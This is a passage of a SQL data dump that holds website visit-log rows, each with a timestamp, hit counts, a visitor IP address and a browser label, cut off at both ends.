546782601,2,2,0,0,'5.45.207.79','other'),(366006,1546782775,3,3,0,0,'216.244.66.241','other'),(366007,1546782807,1,1,0,0,'37.9.113.148','other'),(366008,1546782997,1,1,0,0,'109.207.199.48','chrome'),(366009,1546783338,3,3,0,0,'95.108.213.4','other'),(366010,1546783443,1,1,0,0,'91.244.40.139','chrome'),(366011,1546783492,1,1,0,0,'54.36.148.71','other'),(366012,1546783519,2,2,0,0,'66.249.66.156','chrome'),(366013,1546783555,2,2,0,0,'46.211.133.30','chrome'),(366014,1546783583,2,2,0,0,'178.154.244.11','other'),(366015,1546783594,5,5,0,0,'141.8.142.103','other'),(366016,1546783689,1,1,0,0,'216.244.66.241','other'),(366017,1546783791,12,12,0,0,'5.45.207.79','other'),(366018,1546783806,6,6,0,0,'5.45.207.19','other'),(366019,1546783872,2,2,0,0,'40.77.167.80','other'),(366020,1546783881,1,1,0,0,'87.250.224.47','other'),(366021,1546784079,1,1,0,0,'54.36.149.6','other'),(366022,1546784145,1,1,0,0,'173.33.39.22','other'),(366023,1546784255,1,1,0,0,'37.9.113.148','other'),(366024,1546784520,1,1,0,0,'46.229.168.144','other'),(366025,1546784638,1,1,0,0,'178.154.244.11','other'),(366026,1546784745,3,3,0,0,'5.45.207.79','other'),(366027,1546784785,2,2,0,0,'5.45.207.19','other'),(366028,1546784787,1,1,0,0,'141.8.142.103','other'),(366029,1546785004,1,1,0,0,'46.229.168.151','other'),(366030,1546785333,1,1,0,0,'54.36.148.140','other'),(366031,1546785345,1,1,0,0,'46.229.168.145','other'),(366032,1546785579,4,4,0,0,'216.244.66.241','other'),(366033,1546785908,1,1,0,0,'95.108.213.4','other'),(366034,1546785909,1,1,0,0,'216.245.231.76','firefox'),(366035,1546786016,1,1,0,0,'5.45.207.79','other'),(366036,1546786032,1,1,0,0,'46.211.66.78','chrome'),(366037,1546786104,1,1,0,0,'87.250.224.47','other'),(366038,1546786116,1,1,0,0,'213.180.203.9','other'),(366039,1546786545,1,1,0,0,'92.113.127.112','other'),(366040,1546786561,3,3,0,0,'216.244.66.241','other'),(366041,1546786564,1,1,0,0,'46.229.168.133','other'),(366042,1546786577,1,1,0,0,'178.154.244.11','other'),(366043,1546786739,1,1,0,0,'37.9.113.148','other'),(366044,1546786954,2,2,0,0,'52.53.201.78','chrome'),(366045,1546786993,1,1,0,0,'54.36.148.105','other'),(366046,1546787028,1,1,0,0,'46.211.148.40','chrome'),(366047,1546787360,1,1,0,0,'83.185.82.145','other'),(366048,1546787402,3,3,0,0,'148.251.120.201','other'),(366049,1546787703,2,2,0,0,'91.196.178.134','firefox'),(366050,1546787708,1,1,0,0,'91.204.114.71','chrome'),(366051,1546787991,1,1,0,0,'95.108.213.4','other'),(366052,1546788076,2,2,0,0,'37.52.119.128','firefox'),(366053,1546788121,1,1,0,0,'46.229.168.140','other'),(366054,1546788473,5,5,0,0,'216.244.66.241','other'),(366055,1546788627,1,1,0,0,'46.133.80.124','chrome'),(366056,1546788766,1,1,0,0,'8.29.198.26','other'),(366057,1546788820,1,1,0,0,'139.59.132.50','chrome'),(366058,1546788978,1,1,0,0,'54.36.148.13','other'),(366059,1546789079,1,1,0,0,'195.114.136.150','chrome'),(366060,1546789188,3,3,0,0,'178.154.244.11','other'),(366061,1546789212,1,1,0,0,'46.229.168.146','other'),(366062,1546789482,1,1,0,0,'188.163.116.213','chrome'),(366063,1546789655,1,1,0,0,'46.229.168.132','other'),(366064,1546789712,1,1,0,0,'46.229.168.130','other'),(366065,1546789784,1,1,0,0,'46.149.89.93','chrome'),(366066,1546789799,1,1,0,0,'78.111.186.62','chrome'),(366067,1546789868,1,1,0,0,'194.12.68.70','chrome'),(366068,1546789936,1,1,0,0,'66.102.9.58','chrome'),(366069,1546789955,1,1,0,0,'8.29.198.27','other'),(366070,1546790045,1,1,0,0,'37.9.113.148','other'),(366071,1546790056,1,1,0,0,'188.32.101.113','msie'),(366072,1546790089,1,1,0,0,'178.154.244.11','other'),(366073,1546790155,1,1,0,0,'5.45.207.79','other'),(366074,1546790239,1,1,0,0,'5.45.207.19','other'),(366075,1546790350,1,1,0,0,'157.55.39.245','other'),(366076,1546790363,1,1,0,0,'95.163.255.118','other'),(366077,1546790372,1,1,0,0,'95.163.255.112','other'),(366078,1546790375,1,1,0,0,'92.113.78.137','chrome'),(366079,1546790499,1,1,0,0,'207.46.13.51','other'),(366080,1546790608,1,1,0,0,'54.36.148.239','other'),(366081,1546790628,1,1,0,0,'54.36.148.220','other'),(366082,1546790986,1,1,0,0,'66.249.66.152','chrome'),(366083,1546791068,1,1,0,0,'193.186.9.80','chrome'),(366084,1546791113,1,1,0,0,'77.121.188.212','chrome'),(366085,1546791242,10,10,0,0,'216.244.66.241','other'),(366086,1546791285,2,2,0,0,'157.55.39.141','other'),(366087,1546791308,1,1,0,0,'46.229.168.133','other'),(366088,1546792347,1,1,0,0,'85.238.103.51','chrome'),(366089,1546792781,3,3,0,0,'5.45.207.79','other'),(366090,1546792800,1,1,0,0,'54.36.149.3','other'),(366091,1546792827,2,2,0,0,'46.211.128.254','chrome'),(366092,1546792866,3,3,0,0,'178.154.244.11','other'),(366093,1546792873,2,2,0,0,'5.45.207.19','other'),(366094,1546792908,1,1,0,0,'141.8.142.103','other'),(366095,1546793327,1,1,0,0,'46.229.168.143','other'),(366096,1546793478,1,1,0,0,'45.55.60.60','other'),(366097,1546793759,1,1,0,0,'46.229.168.151','other'),(366098,1546793762,1,1,0,0,'46.229.168.139','other'),(366099,1546793814,1,1,0,0,'138.197.107.103','other'),(366100,1546793922,1,1,0,0,'188.163.41.188','chrome'),(366101,1546793973,1,1,0,0,'66.249.66.156','chrome'),(366102,1546794074,8,8,0,0,'216.244.66.241','other'),(366103,1546794769,1,1,0,0,'176.120.63.241','chrome'),(366104,1546794944,1,1,0,0,'80.102.113.125','chrome'),(366105,1546795002,1,1,0,0,'139.59.132.50','chrome'),(366106,1546795135,1,1,0,0,'40.77.167.80','other'),(366107,1546795258,1,1,0,0,'157.55.39.245','other'),(366108,1546795381,1,1,0,0,'194.44.123.118','chrome'),(366109,1546795440,1,1,0,0,'54.36.149.54','other'),(366110,1546795517,1,1,0,0,'54.36.148.47','other'),(366111,1546795736,1,1,0,0,'66.249.66.40','chrome'),(366112,1546796083,1,1,0,0,'54.36.149.46','other'),(366113,1546796246,1,1,0,0,'178.92.250.162','chrome'),(366114,1546796306,1,1,0,0,'195.191.58.4','firefox'),(366115,1546796463,1,1,0,0,'195.230.154.65','chrome'),(366116,1546796477,1,1,0,0,'193.239.234.176','chrome'),(366117,1546796885,1,1,0,0,'46.229.168.140','other'),(366118,1546796906,10,10,0,0,'216.244.66.241','other'),(366119,1546797080,1,1,0,0,'109.207.199.48','chrome'),(366120,1546797131,1,1,0,0,'46.229.168.142','other'),(366121,1546797208,1,1,0,0,'95.163.255.103','other'),(366122,1546797366,1,1,0,0,'95.163.255.108','other'),(366123,1546797463,1,1,0,0,'46.229.168.130','other'),(366124,1546797538,2,2,0,0,'95.163.255.119','other'),(366125,1546797754,1,1,0,0,'95.163.255.107','other'),(366126,1546797883,1,1,0,0,'95.163.255.115','other'),(366127,1546798223,1,1,0,0,'54.36.148.239','other'),(366128,1546798229,1,1,0,0,'91.196.178.176','other'),(366129,1546798342,1,1,0,0,'54.36.149.40','other'),(366130,1546798794,1,1,0,0,'216.244.66.241','other'),(366131,1546798869,2,2,0,0,'207.46.13.24','other'),(366132,1546799168,1,1,0,0,'95.163.255.98','other'),(366133,1546799170,1,1,0,0,'95.163.255.99','other'),(366134,1546799406,1,1,0,0,'91.196.178.75','chrome'),(366135,1546799582,1,1,0,0,'54.36.149.5','other'),(366136,1546799598,4,4,0,0,'78.154.184.161','chrome'),(366137,1546799599,1,1,0,0,'8.29.198.26','other'),(366138,1546799709,9,9,0,0,'216.244.66.241','other'),(366139,1546799890,1,1,0,0,'78.154.176.39','chrome'),(366140,1546800109,1,1,0,0,'46.229.168.140','other'),(366141,1546800132,1,1,0,0,'91.200.182.172','chrome'),(366142,1546800158,2,2,0,0,'94.244.151.41','chrome'),(366143,1546800302,1,1,0,0,'54.36.148.250','other'),(366144,1546800458,2,2,0,0,'157.55.39.107','other'),(366145,1546800796,1,1,0,0,'8.29.198.26','other'),(366146,1546800810,1,1,0,0,'46.229.168.137','other'),(366147,1546800835,1,1,0,0,'54.36.149.91','other'),(366148,1546800914,1,1,0,0,'195.149.108.45','chrome'),(366149,1546801287,1,1,0,0,'46.211.71.74','chrome'),(366150,1546801303,1,1,0,0,'157.55.39.245','other'),(366151,1546801492,1,1,0,0,'213.180.203.9','other'),(366152,1546801499,1,1,0,0,'95.108.181.54','other'),(366153,1546801583,3,3,0,0,'178.154.244.11','other'),(366154,1546801664,2,2,0,0,'5.45.207.19','other'),(366155,1546801849,1,1,0,0,'95.108.213.4','other'),(366156,1546802051,1,1,0,0,'46.133.153.184','chrome'),(366157,1546802057,2,2,0,0,'5.45.207.79','other'),(366158,1546802232,1,1,0,0,'95.163.255.98','other'),(366159,1546802250,1,1,0,0,'95.163.255.96','other'),(366160,1546802374,1,1,0,0,'194.242.103.140','chrome'),(366161,1546802427,1,1,0,0,'54.36.148.146','other'),(366162,1546802538,8,8,0,0,'216.244.66.241','other'),(366163,1546802541,1,1,0,0,'178.154.244.11','other'),(366164,1546802873,1,1,0,0,'54.36.149.58','other'),(366165,1546802985,1,1,0,0,'46.211.151.198','chrome'),(366166,1546803339,1,1,0,0,'54.36.149.31','other'),(366167,1546803425,1,1,0,0,'54.36.149.79','other'),(366168,1546803450,1,1,0,0,'178.154.244.11','other'),(366169,1546803479,3,3,0,0,'216.244.66.241','other'),(366170,1546803652,1,1,0,0,'164.127.205.210','chrome'),(366171,1546803829,1,1,0,0,'54.36.149.86','other'),(366172,1546804017,1,1,0,0,'46.229.168.132','other'),(366173,1546804175,1,1,0,0,'46.229.168.129','other'),(366174,1546804304,1,1,0,0,'66.249.66.40','chrome'),(366175,1546804425,1,1,0,0,'82.78.55.208','chrome'),(366176,1546804427,1,1,0,0,'95.163.255.96','other'),(366177,1546804429,1,1,0,0,'95.163.255.97','other'),(366178,1546804443,1,1,0,0,'216.244.66.241','other'),(366179,1546804542,1,1,0,0,'46.172.146.232','chrome'),(366180,1546804678,1,1,0,0,'54.36.148.144','other'),(366181,1546804816,1,1,0,0,'46.229.168.146','other'),(366182,1546805109,1,1,0,0,'54.36.148.147','other'),(366183,1546805144,1,1,0,0,'54.36.148.35','other'),(366184,1546805417,8,8,0,0,'216.244.66.241','other'),(366185,1546806036,1,1,0,0,'172.58.30.189','other'),(366186,1546806051,1,1,0,0,'87.250.224.65','other'),(366187,1546806118,1,1,0,0,'5.45.207.79','other'),(366188,1546806239,1,1,0,0,'46.229.168.150','other'),(366189,1546806303,1,1,0,0,'178.92.190.227','chrome'),(366190,1546806400,1,1,0,0,'46.201.129.145','chrome'),(366191,1546806426,1,1,0,0,'54.36.149.53','other'),(366192,1546806475,1,1,0,0,'46.229.168.137','other'),(366194,1546806476,1,1,0,0,'46.229.168.132','other'),(366195,1546806808,1,1,0,0,'54.36.148.241','other'),(366196,1546806912,1,1,0,0,'46.53.227.153','chrome'),(366197,1546806948,1,1,0,0,'91.196.178.189','chrome'),(366198,1546807137,1,1,0,0,'216.244.66.241','other'),(366199,1546807710,1,1,0,0,'172.58.30.189','other'),(366200,1546807940,2,2,0,0,'91.196.178.98','other'),(366201,1546808179,1,1,0,0,'46.229.168.129','other'),(366202,1546808196,7,7,0,0,'216.244.66.241','other'),(366203,1546808245,1,1,0,0,'212.66.48.27','chrome'),(366204,1546809047,1,1,0,0,'188.231.246.52','chrome'),(366205,1546809070,1,1,0,0,'178.136.184.244','firefox'),(366206,1546809125,1,1,0,0,'46.229.168.141','other'),(366207,1546809127,1,1,0,0,'46.229.168.146','other'),(366208,1546809262,1,1,0,0,'37.73.247.251','chrome'),(366209,1546809340,1,1,0,0,'46.229.168.153','other'),(366210,1546809559,1,1,0,0,'95.108.213.4','other'),(366211,1546809684,1,1,0,0,'212.66.48.27','chrome'),(366212,1546809716,1,1,0,0,'66.249.66.157','chrome'),(366214,1546809742,1,1,0,0,'37.9.113.148','other'),(366215,1546809757,2,2,0,0,'207.46.13.24','other'),(366216,1546809872,1,1,0,0,'95.134.29.20','chrome'),(366217,1546809927,1,1,0,0,'46.149.186.155','other'),(366218,1546810024,1,1,0,0,'54.36.148.207','other'),(366219,1546810423,1,1,0,0,'8.29.198.26','other'),(366220,1546810536,1,1,0,0,'91.201.190.64','chrome'),(366221,1546810610,1,1,0,0,'54.36.148.58','other'),(366222,1546810702,2,2,0,0,'157.55.39.225','other'),(366223,1546810940,1,1,0,0,'46.229.61.104','chrome'),(366224,1546810950,1,1,0,0,'54.36.149.27','other'),(366225,1546810966,2,2,0,0,'31.13.127.20','other'),(366226,1546810967,1,1,0,0,'31.13.127.22','other'),(366227,1546810970,1,1,0,0,'31.13.127.18','other'),(366228,1546811027,8,8,0,0,'216.244.66.241','other'),(366229,1546811186,1,1,0,0,'188.163.43.165','chrome'),(366230,1546811638,1,1,0,0,'8.29.198.27','other'),(366231,1546812037,1,1,0,0,'54.36.148.71','other'),(366232,1546812247,1,1,0,0,'216.244.66.241','other'),(366233,1546812248,1,1,0,0,'54.36.148.238','other'),(366234,1546812444,1,1,0,0,'5.170.74.130','chrome'),(366235,1546813271,1,1,0,0,'66.249.93.205','chrome'),(366237,1546813286,1,1,0,0,'46.229.168.139','other'),(366238,1546813911,11,11,0,0,'216.244.66.241','other'),(366239,1546814855,1,1,0,0,'207.46.13.24','other'),(366240,1546815441,1,1,0,0,'54.36.149.32','other'),(366241,1546815736,2,2,0,0,'216.244.66.241','other'),(366242,1546816122,1,1,0,0,'46.229.168.146','other'),(366243,1546816124,1,1,0,0,'46.229.168.142','other'),(366244,1546816374,1,1,0,0,'54.36.148.52','other'),(366245,1546816516,1,1,0,0,'54.36.149.67','other'),(366246,1546816558,1,1,0,0,'54.36.148.49','other'),(366247,1546816606,1,1,0,0,'54.36.148.54','other'),(366248,1546816681,1,1,0,0,'54.36.149.93','other'),(366249,1546816713,1,1,0,0,'40.77.167.129','other'),(366250,1546816764,9,9,0,0,'216.244.66.241','other'),(366251,1546816978,2,2,0,0,'40.77.167.145','other'),(366252,1546817195,1,1,0,0,'54.36.149.12','other'),(366253,1546817531,1,1,0,0,'54.36.148.189','other'),(366254,1546817796,1,1,0,0,'46.229.168.130','other'),(366255,1546817819,1,1,0,0,'54.36.148.254','other'),(366256,1546817865,1,1,0,0,'54.36.148.147','other'),(366257,1546818734,1,1,0,0,'46.229.168.141','other'),(366258,1546818744,5,5,0,0,'216.244.66.241','other'),(366259,1546819491,1,1,0,0,'40.77.167.129','other'),(366260,1546819625,1,1,0,0,'54.36.149.15','other'),(366261,1546819749,7,7,0,0,'216.244.66.241','other'),(366262,1546820183,1,1,0,0,'54.36.148.193','other'),(366263,1546820268,1,1,0,0,'46.229.168.132','other'),(366264,1546820511,1,1,0,0,'54.36.148.31','other'),(366265,1546820660,1,1,0,0,'46.229.168.150','other'),(366266,1546820766,1,1,0,0,'40.77.167.116','other'),(366267,1546821017,1,1,0,0,'46.229.168.149','other'),(366268,1546821252,1,1,0,0,'8.29.198.27','other'),(366269,1546821301,1,1,0,0,'207.46.13.91','other'),(366270,1546821422,1,1,0,0,'216.244.66.241','other'),(366271,1546821808,1,1,0,0,'54.36.149.77','other'),(366272,1546822401,11,11,0,0,'216.244.66.241','other'),(366273,1546822469,1,1,0,0,'8.29.198.26','other'),(366274,1546822508,1,1,0,0,'185.220.102.6','other'),(366275,1546822517,1,1,0,0,'185.233.100.23','other'),(366276,1546822593,1,1,0,0,'40.77.167.129','other'),(366277,1546822928,1,1,0,0,'157.55.39.67','other'),(366278,1546824216,1,1,0,0,'66.249.66.157','chrome'),(366279,1546824217,2,2,0,0,'66.249.66.152','chrome'),(366280,1546824301,1,1,0,0,'216.244.66.241','other'),(366281,1546825246,6,6,0,0,'216.244.66.241','other'),(366282,1546825405,1,1,0,0,'178.154.244.11','other'),(366283,1546825445,1,1,0,0,'141.8.142.103','other'),(366284,1546826208,1,1,0,0,'88.99.2.203','other'),(366285,1546826386,1,1,0,0,'54.36.148.199','other'),(366286,1546826513,1,1,0,0,'54.36.149.7','other'),(366287,1546826539,1,1,0,0,'216.244.66.241','other'),(366288,1546826881,1,1,0,0,'40.77.167.85','other'),(366289,1546827089,1,1,0,0,'95.163.255.97','other'),(366290,1546827091,1,1,0,0,'95.163.255.95','other'),(366291,1546828052,5,5,0,0,'216.244.66.241','other'),(366292,1546828603,1,1,0,0,'54.36.149.72','other'),(366293,1546829457,1,1,0,0,'40.77.167.85','other'),(366294,1546829535,1,1,0,0,'46.229.168.147','other'),(366295,1546829568,1,1,0,0,'66.249.66.59','chrome'),(366297,1546829785,1,1,0,0,'46.229.168.130','other'),(366298,1546829909,1,1,0,0,'216.244.66.241','other'),(366299,1546830859,1,1,0,0,'66.249.66.156','chrome'),(366301,1546830913,10,10,0,0,'216.244.66.241','other'),(366302,1546831131,1,1,0,0,'66.249.66.59','chrome'),(366303,1546831132,1,1,0,0,'66.249.66.42','chrome'),(366304,1546831141,1,1,0,0,'66.249.93.202','chrome'),(366306,1546831168,1,1,0,0,'46.229.168.129','other'),(366307,1546831170,1,1,0,0,'46.229.168.142','other'),(366308,1546831814,1,1,0,0,'40.77.167.85','other'),(366309,1546831819,2,2,0,0,'66.249.66.156','chrome'),(366310,1546832077,1,1,0,0,'8.29.198.27','other'),(366311,1546832129,1,1,0,0,'54.36.148.252','other'),(366312,1546832270,1,1,0,0,'37.54.146.108','other'),(366313,1546832336,3,3,0,0,'95.216.41.162','other'),(366314,1546832476,1,1,0,0,'51.255.65.46','other'),(366315,1546832521,1,1,0,0,'157.55.39.131','other'),(366316,1546832643,1,1,0,0,'46.229.168.134','other'),(366317,1546832874,2,2,0,0,'141.8.142.103','other'),(366318,1546832925,1,1,0,0,'5.45.207.79','other'),(366319,1546833127,1,1,0,0,'95.108.213.4','other'),(366320,1546833287,1,1,0,0,'178.154.244.11','other'),(366321,1546833308,1,1,0,0,'54.36.148.219','other'),(366322,1546833310,1,1,0,0,'8.29.198.26','other'),(366323,1546833408,1,1,0,0,'88.99.2.203','other'),(366324,1546833801,1,1,0,0,'95.163.255.63','other'),(366325,1546833804,1,1,0,0,'95.163.255.69','other'),(366326,1546833826,8,8,0,0,'216.244.66.241','other'),(366327,1546833934,1,1,0,0,'141.8.142.103','other'),(366328,1546834011,2,2,0,0,'34.216.1.53','chrome'),(366329,1546834382,1,1,0,0,'142.255.48.154','other'),(366330,1546835404,2,2,0,0,'216.244.66.241','other'),(366331,1546835783,1,1,0,0,'138.68.65.168','firefox'),(366332,1546835914,1,1,0,0,'54.36.149.14','other'),(366333,1546836397,1,1,0,0,'207.46.13.213','other'),(366334,1546836431,1,1,0,0,'66.249.93.218','chrome'),(366335,1546836450,1,1,0,0,'54.36.148.203','other'),(366336,1546836521,1,1,0,0,'54.36.148.210','other'),(366337,1546836719,10,10,0,0,'216.244.66.241','other'),(366338,1546836925,1,1,0,0,'46.229.168.154','other'),(366339,1546837179,1,1,0,0,'66.249.66.44','chrome'),(366340,1546837378,1,1,0,0,'40.77.167.145','other'),(366341,1546837763,1,1,0,0,'95.163.255.94','other'),(366342,1546837765,1,1,0,0,'95.163.255.93','other'),(366343,1546838075,1,1,0,0,'46.229.168.135','other'),(366344,1546838092,2,2,0,0,'216.244.66.241','other'),(366345,1546838338,2,2,0,0,'66.249.66.156','chrome'),(366346,1546839005,1,1,0,0,'46.229.168.144','other'),(366347,1546839007,1,1,0,0,'46.229.168.130','other'),(366348,1546839287,1,1,0,0,'54.36.148.108','other'),(366349,1546839433,1,1,0,0,'46.229.168.135','other'),(366350,1546839587,6,6,0,0,'216.244.66.241','other'),(366351,1546839705,1,1,0,0,'207.46.13.217','other'),(366352,1546840683,1,1,0,0,'178.154.244.11','other'),(366353,1546840814,1,1,0,0,'54.36.148.172','other'),(366354,1546840863,1,1,0,0,'66.249.66.156','chrome'),(366355,1546840989,2,2,0,0,'66.249.66.154','chrome'),(366356,1546841051,1,1,0,0,'54.36.148.80','other'),(366357,1546841101,1,1,0,0,'37.54.100.43','chrome'),(366358,1546841283,1,1,0,0,'176.120.62.223','chrome'),(366359,1546841448,2,2,0,0,'216.244.66.241','other'),(366360,1546841487,1,1,0,0,'37.9.113.148','other'),(366361,1546841495,1,1,0,0,'37.52.170.157','chrome'),(366362,1546841540,1,1,0,0,'37.9.113.103','other'),(366363,1546841769,1,1,0,0,'46.229.168.152','other'),(366364,1546841771,1,1,0,0,'46.229.168.134','other'),(366365,1546842022,1,1,0,0,'66.249.66.154','chrome'),(366366,1546842223,1,1,0,0,'176.120.62.223','chrome'),(366367,1546842246,1,1,0,0,'54.36.149.3','other'),(366368,1546842528,5,5,0,0,'216.244.66.241','other'),(366369,1546842788,1,1,0,0,'54.36.149.48','other'),(366370,1546842915,1,1,0,0,'8.29.198.27','other'),(366371,1546843043,1,1,0,0,'180.76.15.11','other'),(366372,1546843044,1,1,0,0,'180.76.15.26','other'),(366373,1546843428,1,1,0,0,'207.46.13.217','other'),(366374,1546843914,3,3,0,0,'66.249.66.156','chrome'),(366375,1546844011,1,1,0,0,'216.244.66.241','other'),(366376,1546844157,1,1,0,0,'8.29.198.26','other'),(366377,1546844423,1,1,0,0,'46.229.168.152','other'),(366378,1546844529,1,1,0,0,'54.36.149.57','other'),(366379,1546844838,3,3,0,0,'91.196.178.83','chrome'),(366380,1546844965,1,1,0,0,'66.249.66.155','chrome'),(366381,1546844968,1,1,0,0,'66.249.66.154','chrome'),(366382,1546845269,1,1,0,0,'180.76.15.135','other'),(366383,1546845277,1,1,0,0,'180.76.15.20','other'),(366384,1546845348,1,1,0,0,'40.77.167.181','other'),(366385,1546845388,12,12,0,0,'216.244.66.241','other'),(366386,1546845646,1,1,0,0,'54.36.149.69','other'),(366387,1546845694,1,1,0,0,'31.41.71.33','chrome'),(366388,1546845720,1,1,0,0,'66.249.66.42','chrome'),(366389,1546845823,1,1,0,0,'54.36.148.115','other'),(366390,1546845961,1,1,0,0,'46.255.32.112','chrome'),(366391,1546845993,1,1,0,0,'173.44.35.53','chrome'),(366392,1546846132,1,1,0,0,'54.36.148.95','other'),(366393,1546846642,1,1,0,0,'54.36.148.151','other'),(366394,1546846643,1,1,0,0,'54.36.149.29','other'),(366395,1546846755,1,1,0,0,'54.36.148.154','other'),(366396,1546846823,1,1,0,0,'54.36.148.108','other'),(366397,1546846890,1,1,0,0,'5.45.207.79','other'),(366398,1546846928,1,1,0,0,'37.73.113.105','other'),(366399,1546847024,1,1,0,0,'66.249.66.155','chrome'),(366400,1546847025,1,1,0,0,'66.249.66.156','chrome'),(366401,1546847043,1,1,0,0,'180.76.15.7','other'),(366402,1546847044,1,1,0,0,'180.76.15.135','other'),(366403,1546847065,1,1,0,0,'46.229.168.148','other'),(366404,1546847289,1,1,0,0,'62.57.182.137','other'),(366405,1546847536,1,1,0,0,'91.217.13.56','chrome'),(366406,1546847577,1,1,0,0,'66.249.66.157','chrome'),(366407,1546847620,1,1,0,0,'54.36.149.28','other'),(366408,1546847889,1,1,0,0,'40.77.167.181','other'),(366409,1546847891,1,1,0,0,'46.229.168.150','other'),(366410,1546848201,4,4,0,0,'216.244.66.241','other'),(366411,1546848222,1,1,0,0,'212.22.223.70','chrome'),(366412,1546848514,1,1,0,0,'46.229.168.153','other'),(366413,1546849035,1,1,0,0,'46.211.10.139','chrome'),(366414,1546849071,1,1,0,0,'46.229.168.137','other'),(366415,1546849108,1,1,0,0,'31.134.127.134','chrome'),(366416,1546849164,1,1,0,0,'46.229.168.130','other'),(366417,1546849373,1,1,0,0,'46.203.99.172','chrome'),(366418,1546849549,1,1,0,0,'54.36.149.76','other'),(366419,1546850037,1,1,0,0,'46.229.168.146','other'),(366420,1546850117,1,1,0,0,'193.105.62.149','chrome'),(366421,1546850466,1,1,0,0,'157.55.39.84','other'),(366422,1546850494,1,1,0,0,'46.229.168.132','other'),(366423,1546850496,1,1,0,0,'46.229.168.142','other'),(366424,1546850660,1,1,0,0,'54.36.148.146','other'),(366425,1546850912,1,1,0,0,'46.229.168.135','other'),(366426,1546851030,1,1,0,0,'54.36.148.199','other'),(366427,1546851055,7,7,0,0,'216.244.66.241','other'),(366428,1546851222,1,1,0,0,'54.36.149.101','other'),(366429,1546851494,1,1,0,0,'46.229.168.137','other'),(366430,1546852106,1,1,0,0,'91.201.244.252','chrome'),(366431,1546852166,1,1,0,0,'54.36.149.57','other'),(366432,1546852311,1,1,0,0,'54.36.148.124','other'),(366433,1546852467,1,1,0,0,'176.126.162.34','chrome'),(366434,1546852777,1,1,0,0,'54.36.149.78','other'),(366435,1546852785,1,1,0,0,'95.163.255.163','other'),(366436,1546852787,1,1,0,0,'95.163.255.162','other'),(366437,1546852801,1,1,0,0,'217.66.159.123','other'),(366438,1546853312,1,1,0,0,'54.36.148.25','other'),(366439,1546853754,1,1,0,0,'8.29.198.27','other'),(366440,1546853779,1,1,0,0,'46.133.91.162','chrome'),(366441,1546853855,6,6,0,0,'216.244.66.241','other'),(366442,1546853879,1,1,0,0,'40.77.167.83','other'),(366443,1546854038,1,1,0,0,'46.229.168.148','other'),(366444,1546854086,1,1,0,0,'66.249.66.155','chrome'),(366445,1546854133,1,1,0,0,'54.36.148.74','other'),(366446,1546854178,1,1,0,0,'54.36.148.158','other'),(366447,1546854486,1,1,0,0,'40.77.167.181','other'),(366448,1546854793,1,1,0,0,'66.249.66.156','chrome'),(366449,1546854810,1,1,0,0,'5.45.207.19','other'),(366450,1546854843,1,1,0,0,'46.229.168.129','other'),(366451,1546854999,1,1,0,0,'8.29.198.27','other'),(366452,1546855039,2,2,0,0,'46.211.135.111','chrome'),(366453,1546855609,1,1,0,0,'40.77.167.181','other'),(366454,1546855728,1,1,0,0,'216.244.66.241','other'),(366455,1546855974,1,1,0,0,'23.94.64.253','chrome'),(366456,1546856448,1,1,0,0,'66.249.66.59','chrome'),(366457,1546856449,1,1,0,0,'66.249.66.44','chrome'),(366458,1546856561,1,1,0,0,'218.30.103.183','other'),(366459,1546856645,1,1,0,0,'54.36.148.196','other'),(366460,1546856656,8,8,0,0,'216.244.66.241','other'),(366461,1546857066,1,1,0,0,'46.229.168.135','other'),(366462,1546857171,1,1,0,0,'54.36.148.116','other'),(366463,1546857538,1,1,0,0,'54.36.148.154','other'),(366464,1546857596,3,3,0,0,'216.244.66.241','other'),(366465,1546857651,1,1,0,0,'54.36.149.65','other'),(366466,1546857817,1,1,0,0,'66.249.66.154','chrome'),(366467,1546858285,1,1,0,0,'54.36.149.51','other'),(366468,1546858286,1,1,0,0,'54.36.148.197','other'),(366469,1546858920,1,1,0,0,'46.229.168.138','other'),(366470,1546858923,1,1,0,0,'46.229.168.153','other'),(366471,1546859256,1,1,0,0,'54.36.148.216','other'),(366472,1546859339,1,1,0,0,'207.46.13.87','other'),(366473,1546859374,2,2,0,0,'54.36.148.150','other'),(366474,1546859453,9,9,0,0,'216.244.66.241','other'),(366475,1546859559,1,1,0,0,'54.36.148.252','other'),(366476,1546859634,1,1,0,0,'54.36.148.179','other'),(366477,1546860209,1,1,0,0,'54.36.148.178','other'),(366478,1546860285,1,1,0,0,'54.36.148.194','other'),(366479,1546860544,1,1,0,0,'54.36.149.56','other'),(366480,1546860732,1,1,0,0,'66.249.66.154','chrome'),(366481,1546860905,1,1,0,0,'207.46.13.87','other'),(366482,1546861027,1,1,0,0,'46.229.168.150','other'),(366483,1546861136,1,1,0,0,'216.244.66.241','other'),(366484,1546862068,1,1,0,0,'54.36.149.103','other'),(366485,1546862155,1,1,0,0,'213.180.203.9','other'),(366486,1546862219,1,1,0,0,'54.36.148.206','other'),(366487,1546862264,5,5,0,0,'216.244.66.241','other'),(366488,1546862293,1,1,0,0,'54.36.148.83','other'),(366489,1546862439,1,1,0,0,'46.229.168.141','other'),(366490,1546862614,1,1,0,0,'54.36.148.240','other'),(366491,1546862617,1,1,0,0,'54.36.148.86','other'),(366492,1546862625,2,2,0,0,'95.163.255.97','other'),(366493,1546863562,1,1,0,0,'54.36.149.46','other'),(366494,1546864024,1,1,0,0,'46.211.131.231','chrome'),(366495,1546864303,1,1,0,0,'46.211.71.201','chrome'),(366496,1546864351,1,1,0,0,'66.249.66.155','chrome'),(366497,1546864352,1,1,0,0,'66.249.66.154','chrome'),(366498,1546864595,1,1,0,0,'8.29.198.27','other'),(366499,1546865032,1,1,0,0,'54.36.148.183','other'),(366500,1546865057,3,3,0,0,'216.244.66.241','other'),(366501,1546865296,2,2,0,0,'188.191.239.222','chrome'),(366502,1546865591,1,1,0,0,'54.36.148.254','other'),(366503,1546865768,2,2,0,0,'46.229.168.132','other'),(366504,1546865842,1,1,0,0,'8.29.198.25','other'),(366505,1546866431,1,1,0,0,'46.229.168.147','other'),(366506,1546866585,1,1,0,0,'95.163.255.113','other'),(366507,1546866834,3,3,0,0,'95.163.255.98','other'),(366508,1546866838,1,1,0,0,'95.163.255.99','other'),(366509,1546866854,1,1,0,0,'95.163.255.115','other'),(366510,1546866928,2,2,0,0,'95.163.255.92','other'),(366511,1546867287,1,1,0,0,'46.211.71.201','chrome'),(366512,1546867629,1,1,0,0,'13.57.233.99','chrome'),(366513,1546867636,1,1,0,0,'180.76.15.9','other'),(366514,1546867854,1,1,0,0,'37.9.113.103','other'),(366515,1546867869,8,8,0,0,'216.244.66.241','other'),(366516,1546867895,1,1,0,0,'95.163.255.102','other'),(366517,1546868000,1,1,0,0,'95.163.255.104','other'),(366518,1546868056,1,1,0,0,'207.46.13.58','other'),(366519,1546868069,1,1,0,0,'87.250.224.65','oth